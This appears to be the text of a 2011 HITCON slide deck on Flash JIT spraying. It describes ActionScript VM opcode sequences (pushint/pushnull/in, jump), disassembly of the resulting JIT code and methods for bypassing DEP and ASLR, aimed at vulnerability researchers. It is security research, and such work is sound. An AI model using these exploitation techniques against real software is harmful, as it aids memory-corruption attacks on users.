The Flash JIT Spraying is Back Hints for Flash Vulnerability Researchers

Ming-chieh Pan (Nanika) <naninb@gmail.com>Senior vulnerability researcher, Net-Hack Inc.

Sung-ting Tsai (TT) <ttsecurity@gmail.com>Staff Research Engineer, Trend Micro.

XOR Trick http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf

•0x3C909090^0x3C909090^0x3C909090^0x3C909090^ …•0x1A1A0101: 90 NOP •0x1A1A0102: 90 NOP •0x1A1A0103: 90 NOP •0x1A1A0104: 3C35 CMP AL, 35

XOR JIT Spraying doesn’t workin Flash 10.1

• @asintsov: No JIT-SPRAY in Flash 10.1. Pages with code are crypted )) But idea will never die, that i show on HITB in AMS)

• Jun 13, 2010 6:18 AM

Flash JIT Hacking

• Flash parser tool– https://github.com/sporst/SWFREtools/

• We need an easy way to set breakpoint in the JIT code to observe the memory.

• Using our AVM fuzzer, we found a new way to make JIT spraying works.

• Magic number: 0x2d 0x01 0x20 0xb4

Magic Number - pushint

• Push an int value onto the stack. • Format – pushint – index

• Forms – pushint = 45 (0x2d)

• Stack – … => …, value

• 0x2d 0x01

index

• Index 1->60178

Magic Number - pushnull

• Push null. • Format – pushnull

• Forms – pushnull = 32 (0x20)

• Stack – … => …, null

• 0x20

Magic Number - in

• Determine whether an object has a named property.

• Format – in

• Forms – in = 180 (0xb4)

• Stack – …, name, obj => …, result

AVM code Insert(modify)

• Select method body• Change the code to

pushint/pushnull/in

breakpoint

• The second pushnull could crash the flash• Set Ollydbg just in time debugger• Focus on ESP+C

[ESP+C]

• It could find our JIT code page and we can analyze.

• Remember pushint/pushnull/in?• Push eb12• Push 1• Call 007b7c80

Idea never die

• Can we control it?• Try to put another

integer.• Try to put 2 pushint.

JIT again bypass DEP• 0291C019 90 NOP• 0291C01A 90 NOP• 0291C01B 90 NOP• 0291C01C 3C 68 CMP AL,68• 0291C01E 4E DEC ESI• 0291C01F EB 09 JMP SHORT 0291C02A

• 0291C02A 90 NOP• 0291C02B 90 NOP• 0291C02C 90 NOP• 0291C02D 3C 68 CMP AL,68• 0291C02F 4E DEC ESI• 0291C030 EB 09 JMP SHORT 0291C03B

Bypass ASLR

• Spraying with numbers of push opcodes might be a problem.

• It needs a lot of push opcodes.• It needs to modify the AVM struct max_stack.• When it is more than 2047, it could fail.

File Size and Zlib

• Spraying more method bodies could cause large file size.

• Zlib could help:– 20.5 Mb->71.9k

File Size Spraying

Control the MEM

Reliable?

• 68 9090903C PUSH 3C909090• 68 4EEB0900 PUSH 9EB4E• 8BCB MOV ECX,EBX• E8 527CCAFD CALL flash.007B7C80• Success rate:

6/17 = 35% ↓

• We need more luck!

Another NOP JIT code

• jump • Format – jump – offset

• Forms – jump = 16 (0x10)

• Stack – … => …

• 0x10 00 00 00

JIT NOP

• 0140B1DC 00EB ADD BL,CH• 0140B1DE 00EB ADD BL,CH• 0140B1E0 00EB ADD BL,CH

• Success rate:1/2 = 50% ↓

Conclusion

• Our hints might help you to find useful flash opcodes.

• The in opcode is similar to XOR.

• More techniques are coming soon.

Hacks in Taiwan Conference 2011http://www.hitcon.org/hit2011/en/